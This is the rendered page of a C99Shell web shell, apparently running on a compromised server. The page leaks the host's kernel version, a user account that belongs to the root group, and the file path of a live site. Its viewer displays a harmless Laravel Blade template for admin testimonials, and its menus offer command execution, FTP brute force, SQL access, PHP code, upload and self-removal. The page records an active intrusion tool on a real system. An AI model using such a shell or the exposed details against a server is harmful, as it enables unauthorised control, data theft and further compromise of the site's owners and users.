!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/resources/views/landing/testimonials/   drwxr-xr-x
Free 26.51 GB of 117.98 GB (22.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (4.02 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('general.index', $setup)

@section('cardbody')
<div class="container-fluid">
    <div class="row">
    @foreach ($setup['items'] as $item)
        <div class="col-sm-12 col-md-6 col-lg-4 col-xl-4 mb-4 ">
            <br/>
            <a href="{{ route("admin.landing.testimonials.edit",["testimonial"=>$item->id]) }}">
            <div class="card cardWithShadow cardWithShadowAnimated testimonialCard shadow" data-toggle="tooltip" data-placement="top" title="{{ __('Edit this testimonial')}}">
              <div class="card-body">
                <div class="testimonials-item-author">
                  <div class="testimonials-item-author-image-container">
                    <img class="avatar rounded-circle"
                      src='{{ $item->image_link }}'
                      class="testimonials-item-author-image">
                  </div>
                  <div class="testimonials-item-author-info">
                    <div class="testimonials-item-author-info-name">{{ $item->title }}</div>
                    <div class="testimonials-item-author-info-position"><span class="small">{{ $item->subtitle }}</span></div>
                  </div>
                  <div class="testimonials-item-stars">
                    <span class="testimonials-item-stars-item">
                      <svg xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" width="14px" height="14px"
                        viewBox="0 0 100 100">
                        <use xlink:href="#icon-star">
                          <svg viewBox="4 4 16 16" id="icon-star">
                            <path
                              d="M11.567 17.36L8.063 19.2a.93.93 0 0 1-1.35-.98l.67-3.902a.93.93 0 0 0-.268-.823l-2.834-2.763a.93.93 0 0 1 .515-1.587l3.918-.569a.93.93 0 0 0 .7-.509l1.752-3.55a.93.93 0 0 1 1.668 0l1.752 3.55a.93.93 0 0 0 .7.51l3.917.568a.93.93 0 0 1 .516 1.587l-2.835 2.763a.93.93 0 0 0-.267.823l.67 3.902a.93.93 0 0 1-1.35.98l-3.504-1.842a.93.93 0 0 0-.866 0z">
                            </path>
                          </svg>
                        </use>
                      </svg>
                    </span>
                    <span class="testimonials-item-stars-item">
                      <svg xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" width="14px" height="14px"
                        viewBox="0 0 100 100">
                        <use xlink:href="#icon-star"></use>
                      </svg>
                    </span>
                    <span class="testimonials-item-stars-item">
                      <svg xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" width="14px" height="14px"
                        viewBox="0 0 100 100">
                        <use xlink:href="#icon-star"></use>
                      </svg>
                    </span>
                    <span class="testimonials-item-stars-item">
                      <svg xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" width="14px" height="14px"
                        viewBox="0 0 100 100">
                        <use xlink:href="#icon-star"></use>
                      </svg>
                    </span>
                    <span class="testimonials-item-stars-item">
                      <svg xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="none" width="14px" height="14px"
                        viewBox="0 0 100 100">
                        <use xlink:href="#icon-star"></use>
                      </svg>
                    </span>
                  </div>
                </div>

                <blockquote class="blockquote tetimonial_text">
                  <p class="mb-0">
                    {{ $item->description }}
                  </p>
                </blockquote>
              </div>
            </div>
            </a>
            <br/>
            <div class="text-center">
                <a href="{{ route("admin.landing.testimonials.delete",["testimonial"=>$item->id]) }}" class="btn btn-danger btn-sm">{{ __('Delete') }}</a>
            </div>
          </div>
    @endforeach
    </div>
</div>

@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--